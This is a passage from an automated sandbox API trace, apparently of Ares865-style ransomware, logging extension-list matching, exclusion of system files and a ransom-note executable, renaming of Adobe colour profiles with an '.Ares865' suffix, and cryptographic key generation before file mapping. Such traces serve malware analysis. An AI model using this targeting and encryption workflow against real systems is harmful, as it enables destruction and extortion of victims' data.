returned 1 [0106.093] lstrlenW (lpString="mas") returned 3 [0106.093] lstrcmpiW (lpString1="icc", lpString2="mas") returned -1 [0106.094] lstrlenW (lpString="mav") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mav") returned -1 [0106.094] lstrlenW (lpString="maw") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="maw") returned -1 [0106.094] lstrlenW (lpString="mdbhtml") returned 7 [0106.094] lstrcmpiW (lpString1="RGB.icc", lpString2="mdbhtml") returned 1 [0106.094] lstrlenW (lpString="mdn") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mdn") returned -1 [0106.094] lstrlenW (lpString="mdt") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mdt") returned -1 [0106.094] lstrlenW (lpString="mfd") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mfd") returned -1 [0106.094] lstrlenW (lpString="mpd") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mpd") returned -1 [0106.094] lstrlenW (lpString="mrg") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mrg") returned -1 [0106.094] lstrlenW (lpString="mud") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mud") returned -1 [0106.094] lstrlenW (lpString="mwb") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="mwb") returned -1 [0106.094] lstrlenW (lpString="myd") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="myd") returned -1 [0106.094] lstrlenW (lpString="ndf") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="ndf") returned -1 [0106.094] lstrlenW (lpString="nnt") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="nnt") returned -1 [0106.094] lstrlenW (lpString="nrmlib") returned 6 [0106.094] lstrcmpiW (lpString1="GB.icc", lpString2="nrmlib") returned -1 [0106.094] lstrlenW (lpString="ns2") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="ns2") returned -1 [0106.094] lstrlenW (lpString="ns3") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="ns3") returned -1 [0106.094] lstrlenW (lpString="ns4") returned 3 [0106.094] lstrcmpiW (lpString1="icc", lpString2="ns4") returned -1 [0106.095] lstrlenW (lpString="nsf") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="nsf") returned -1 [0106.095] lstrlenW (lpString="nv") returned 2 [0106.095] lstrcmpiW (lpString1="cc", lpString2="nv") returned -1 [0106.095] lstrlenW (lpString="nv2") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="nv2") returned -1 [0106.095] lstrlenW (lpString="nwdb") returned 4 [0106.095] lstrcmpiW (lpString1=".icc", lpString2="nwdb") returned -1 [0106.095] lstrlenW (lpString="nyf") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="nyf") returned -1 [0106.095] lstrlenW (lpString="odb") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="odb") returned -1 [0106.095] lstrlenW (lpString="odb") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="odb") returned -1 [0106.095] lstrlenW (lpString="oqy") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="oqy") returned -1 [0106.095] lstrlenW (lpString="ora") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="ora") returned -1 [0106.095] lstrlenW (lpString="orx") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="orx") returned -1 [0106.095] lstrlenW (lpString="owc") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="owc") returned -1 [0106.095] lstrlenW (lpString="p96") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="p96") returned -1 [0106.095] lstrlenW (lpString="p97") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="p97") returned -1 [0106.095] lstrlenW (lpString="pan") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="pan") returned -1 [0106.095] lstrlenW (lpString="pdb") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="pdb") returned -1 [0106.095] lstrlenW (lpString="pdm") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="pdm") returned -1 [0106.095] lstrlenW (lpString="pnz") returned 3 [0106.095] lstrcmpiW (lpString1="icc", lpString2="pnz") returned -1 [0106.095] lstrlenW (lpString="qry") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="qry") returned -1 [0106.096] lstrlenW (lpString="qvd") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="qvd") returned -1 [0106.096] lstrlenW (lpString="rbf") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="rbf") returned -1 [0106.096] lstrlenW (lpString="rctd") returned 4 [0106.096] lstrcmpiW (lpString1=".icc", lpString2="rctd") returned -1 [0106.096] lstrlenW (lpString="rod") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="rod") returned -1 [0106.096] lstrlenW (lpString="rodx") returned 4 [0106.096] lstrcmpiW (lpString1=".icc", lpString2="rodx") returned -1 [0106.096] lstrlenW (lpString="rpd") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="rpd") returned -1 [0106.096] lstrlenW (lpString="rsd") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="rsd") returned -1 [0106.096] lstrlenW (lpString="sas7bdat") returned 8 [0106.096] lstrcmpiW (lpString1="cRGB.icc", lpString2="sas7bdat") returned -1 [0106.096] lstrlenW (lpString="sbf") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="sbf") returned -1 [0106.096] lstrlenW (lpString="scx") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="scx") returned -1 [0106.096] lstrlenW (lpString="sdb") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="sdb") returned -1 [0106.096] lstrlenW (lpString="sdc") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="sdc") returned -1 [0106.096] lstrlenW (lpString="sdf") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="sdf") returned -1 [0106.096] lstrlenW (lpString="sis") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="sis") returned -1 [0106.096] lstrlenW (lpString="spq") returned 3 [0106.096] lstrcmpiW (lpString1="icc", lpString2="spq") returned -1 [0106.096] lstrlenW (lpString="te") returned 2 [0106.096] lstrcmpiW (lpString1="cc", lpString2="te") returned -1 [0106.097] lstrlenW (lpString="teacher") returned 7 [0106.097] lstrcmpiW (lpString1="RGB.icc", lpString2="teacher") returned -1 [0106.097] lstrlenW (lpString="tmd") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="tmd") returned -1 [0106.097] lstrlenW (lpString="tps") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="tps") returned -1 [0106.097] lstrlenW (lpString="trc") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="trc") returned -1 [0106.097] lstrlenW (lpString="trc") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="trc") returned -1 [0106.097] lstrlenW (lpString="trm") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="trm") returned -1 [0106.097] lstrlenW (lpString="udb") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="udb") returned -1 [0106.097] lstrlenW (lpString="udl") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="udl") returned -1 [0106.097] lstrlenW (lpString="usr") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="usr") returned -1 [0106.097] lstrlenW (lpString="v12") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="v12") returned -1 [0106.097] lstrlenW (lpString="vis") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="vis") returned -1 [0106.097] lstrlenW (lpString="vpd") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="vpd") returned -1 [0106.097] lstrlenW (lpString="vvv") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="vvv") returned -1 [0106.097] lstrlenW (lpString="wdb") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="wdb") returned -1 [0106.097] lstrlenW (lpString="wmdb") returned 4 [0106.097] lstrcmpiW (lpString1=".icc", lpString2="wmdb") returned -1 [0106.097] lstrlenW (lpString="wrk") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="wrk") returned -1 [0106.097] lstrlenW (lpString="xdb") returned 3 [0106.097] lstrcmpiW (lpString1="icc", lpString2="xdb") returned -1 [0106.097] lstrlenW (lpString="xld") returned 3 [0106.098] lstrcmpiW (lpString1="icc", lpString2="xld") returned -1 [0106.098] lstrlenW (lpString="xmlff") returned 5 [0106.098] lstrcmpiW (lpString1="B.icc", lpString2="xmlff") returned -1 [0106.098] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wscRGB.icc.Ares865") returned 254 [0106.098] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\wscrgb.icc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wscRGB.icc.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\wscrgb.icc.ares865"), dwFlags=0x1) returned 1 [0106.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wscRGB.icc.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\wscrgb.icc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.100] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=66208) returned 1 [0106.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.100] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.101] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.101] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.101] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x105a0, lpName=0x0) returned 0x124 [0106.104] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x105a0) returned 0x190000 [0106.153] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.164] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.164] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 [0106.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0106.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0106.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.177] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0106.178] CloseHandle (hObject=0x124) returned 1 [0106.178] CloseHandle (hObject=0x118) returned 1 [0106.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0106.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0106.178] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0xa74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsRGB.icc", cAlternateFileName="")) returned 1 [0106.178] lstrcmpiW (lpString1="wsRGB.icc", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.178] lstrcmpiW (lpString1="wsRGB.icc", lpString2="aoldtz.exe") returned 1 [0106.178] lstrcmpiW (lpString1="wsRGB.icc", lpString2=".") returned 1 [0106.178] lstrcmpiW (lpString1="wsRGB.icc", lpString2="..") returned 1 [0106.178] lstrcmpiW (lpString1="wsRGB.icc", lpString2="windows") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="bootmgr") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="temp") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="pagefile.sys") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="boot") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="ids.txt") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="ntuser.dat") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="perflogs") returned 1 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2="MSBuild") returned 1 [0106.179] lstrlenW (lpString="wsRGB.icc") returned 9 [0106.179] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wscRGB.icc") returned 246 [0106.179] lstrcpyW (in: lpString1=0x2cce5d8, lpString2="wsRGB.icc" | out: lpString1="wsRGB.icc") returned="wsRGB.icc" [0106.179] lstrlenW (lpString="wsRGB.icc") returned 9 [0106.179] lstrlenW (lpString="Ares865") returned 7 [0106.179] lstrcmpiW (lpString1="RGB.icc", lpString2="Ares865") returned 1 [0106.179] lstrlenW (lpString=".dll") returned 4 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2=".dll") returned 1 [0106.179] lstrlenW (lpString=".lnk") returned 4 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2=".lnk") returned 1 [0106.179] lstrlenW (lpString=".ini") returned 4 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2=".ini") returned 1 [0106.179] lstrlenW (lpString=".sys") returned 4 [0106.179] lstrcmpiW (lpString1="wsRGB.icc", lpString2=".sys") returned 1 [0106.179] lstrlenW (lpString="wsRGB.icc") returned 9 [0106.179] lstrlenW (lpString="bak") returned 3 [0106.179] lstrcmpiW (lpString1="icc", lpString2="bak") returned 1 [0106.179] lstrlenW (lpString="ba_") returned 3 [0106.179] lstrcmpiW (lpString1="icc", lpString2="ba_") returned 1 [0106.179] lstrlenW (lpString="dbb") returned 3 [0106.179] lstrcmpiW (lpString1="icc", lpString2="dbb") returned 1 [0106.179] lstrlenW (lpString="vmdk") returned 4 [0106.179] lstrcmpiW (lpString1=".icc", lpString2="vmdk") returned -1 [0106.179] lstrlenW (lpString="rar") returned 3 [0106.179] lstrcmpiW (lpString1="icc", lpString2="rar") returned -1 [0106.179] lstrlenW (lpString="zip") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="zip") returned -1 [0106.180] lstrlenW (lpString="tgz") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="tgz") returned -1 [0106.180] lstrlenW (lpString="vbox") returned 4 [0106.180] lstrcmpiW (lpString1=".icc", lpString2="vbox") returned -1 [0106.180] lstrlenW (lpString="vdi") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="vdi") returned -1 [0106.180] lstrlenW (lpString="vhd") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="vhd") returned -1 [0106.180] lstrlenW (lpString="vhdx") returned 4 [0106.180] lstrcmpiW (lpString1=".icc", lpString2="vhdx") returned -1 [0106.180] lstrlenW (lpString="avhd") returned 4 [0106.180] lstrcmpiW (lpString1=".icc", lpString2="avhd") returned -1 [0106.180] lstrlenW (lpString="db") returned 2 [0106.180] lstrcmpiW (lpString1="cc", lpString2="db") returned -1 [0106.180] lstrlenW (lpString="db2") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="db2") returned 1 [0106.180] lstrlenW (lpString="db3") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="db3") returned 1 [0106.180] lstrlenW (lpString="dbf") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="dbf") returned 1 [0106.180] lstrlenW (lpString="mdf") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="mdf") returned -1 [0106.180] lstrlenW (lpString="mdb") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="mdb") returned -1 [0106.180] lstrlenW (lpString="sql") returned 3 [0106.180] lstrcmpiW (lpString1="icc", lpString2="sql") returned -1 [0106.180] lstrlenW (lpString="sqlite") returned 6 [0106.180] lstrcmpiW (lpString1="GB.icc", lpString2="sqlite") returned -1 [0106.180] lstrlenW (lpString="sqlite3") returned 7 [0106.180] lstrcmpiW (lpString1="RGB.icc", lpString2="sqlite3") returned -1 [0106.180] lstrlenW (lpString="sqlitedb") returned 8 [0106.180] lstrcmpiW (lpString1="sRGB.icc", lpString2="sqlitedb") returned 1 [0106.180] lstrlenW (lpString="xml") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="xml") returned -1 [0106.181] lstrlenW (lpString="$er") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="$er") returned 1 [0106.181] lstrlenW (lpString="4dd") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="4dd") returned 1 [0106.181] lstrlenW (lpString="4dl") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="4dl") returned 1 [0106.181] lstrlenW (lpString="^^^") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="^^^") returned 1 [0106.181] lstrlenW (lpString="abs") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="abs") returned 1 [0106.181] lstrlenW (lpString="abx") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="abx") returned 1 [0106.181] lstrlenW (lpString="accdb") returned 5 [0106.181] lstrcmpiW (lpString1="B.icc", lpString2="accdb") returned 1 [0106.181] lstrlenW (lpString="accdc") returned 5 [0106.181] lstrcmpiW (lpString1="B.icc", lpString2="accdc") returned 1 [0106.181] lstrlenW (lpString="accde") returned 5 [0106.181] lstrcmpiW (lpString1="B.icc", lpString2="accde") returned 1 [0106.181] lstrlenW (lpString="accdr") returned 5 [0106.181] lstrcmpiW (lpString1="B.icc", lpString2="accdr") returned 1 [0106.181] lstrlenW (lpString="accdt") returned 5 [0106.181] lstrcmpiW (lpString1="B.icc", lpString2="accdt") returned 1 [0106.181] lstrlenW (lpString="accdw") returned 5 [0106.181] lstrcmpiW (lpString1="B.icc", lpString2="accdw") returned 1 [0106.181] lstrlenW (lpString="accft") returned 5 [0106.181] lstrcmpiW (lpString1="B.icc", lpString2="accft") returned 1 [0106.181] lstrlenW (lpString="adb") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="adb") returned 1 [0106.181] lstrlenW (lpString="adb") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="adb") returned 1 [0106.181] lstrlenW (lpString="ade") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="ade") returned 1 [0106.181] lstrlenW (lpString="adf") returned 3 [0106.181] lstrcmpiW (lpString1="icc", lpString2="adf") returned 1 [0106.182] lstrlenW (lpString="adn") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="adn") returned 1 [0106.182] lstrlenW (lpString="adp") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="adp") returned 1 [0106.182] lstrlenW (lpString="alf") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="alf") returned 1 [0106.182] lstrlenW (lpString="ask") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="ask") returned 1 [0106.182] lstrlenW (lpString="btr") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="btr") returned 1 [0106.182] lstrlenW (lpString="cat") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="cat") returned 1 [0106.182] lstrlenW (lpString="cdb") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="cdb") returned 1 [0106.182] lstrlenW (lpString="ckp") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="ckp") returned 1 [0106.182] lstrlenW (lpString="cma") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="cma") returned 1 [0106.182] lstrlenW (lpString="cpd") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="cpd") returned 1 [0106.182] lstrlenW (lpString="dacpac") returned 6 [0106.182] lstrcmpiW (lpString1="GB.icc", lpString2="dacpac") returned 1 [0106.182] lstrlenW (lpString="dad") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="dad") returned 1 [0106.182] lstrlenW (lpString="dadiagrams") returned 10 [0106.182] lstrlenW (lpString="daschema") returned 8 [0106.182] lstrcmpiW (lpString1="sRGB.icc", lpString2="daschema") returned 1 [0106.182] lstrlenW (lpString="db-journal") returned 10 [0106.182] lstrlenW (lpString="db-shm") returned 6 [0106.182] lstrcmpiW (lpString1="GB.icc", lpString2="db-shm") returned 1 [0106.182] lstrlenW (lpString="db-wal") returned 6 [0106.182] lstrcmpiW (lpString1="GB.icc", lpString2="db-wal") returned 1 [0106.182] lstrlenW (lpString="dbc") returned 3 [0106.182] lstrcmpiW (lpString1="icc", lpString2="dbc") returned 1 [0106.183] lstrlenW (lpString="dbs") returned 3 [0106.183] lstrcmpiW (lpString1="icc", lpString2="dbs") returned 1 [0106.183] lstrlenW (lpString="dbt") returned 3 [0106.183] lstrcmpiW (lpString1="icc", lpString2="dbt") returned 1 [0106.183] lstrlenW (lpString="dbv") returned 3 [0106.183] lstrcmpiW (lpString1="icc", lpString2="dbv") returned 1 [0106.183] lstrlenW (lpString="dbx") returned 3 [0106.183] lstrcmpiW (lpString1="icc", lpString2="dbx") returned 1 [0106.183] lstrlenW (lpString="dcb") returned 3 [0106.183] lstrcmpiW (lpString1="icc", lpString2="dcb") returned 1 [0106.183] lstrcmpiW (lpString1="icc", lpString2="dct") returned 1 [0106.184] lstrcmpiW (lpString1="icc", lpString2="dcx") returned 1 [0106.184] lstrcmpiW (lpString1="icc", lpString2="ddl") returned 1 [0106.184] lstrcmpiW (lpString1=".icc", lpString2="dlis") returned -1 [0106.184] lstrcmpiW (lpString1="icc", lpString2="dp1") returned 1 [0106.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wsRGB.icc.Ares865") returned 253 [0106.184] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\wsrgb.icc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wsRGB.icc.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\wsrgb.icc.ares865"), dwFlags=0x1) returned 1 [0106.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wsRGB.icc.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\wsrgb.icc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2676) returned 1 [0106.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.191] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.192] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.192] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.192] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd80, lpName=0x0) returned 0x124 [0106.194] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd80) returned 0x190000 [0106.198] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.206] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.207] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 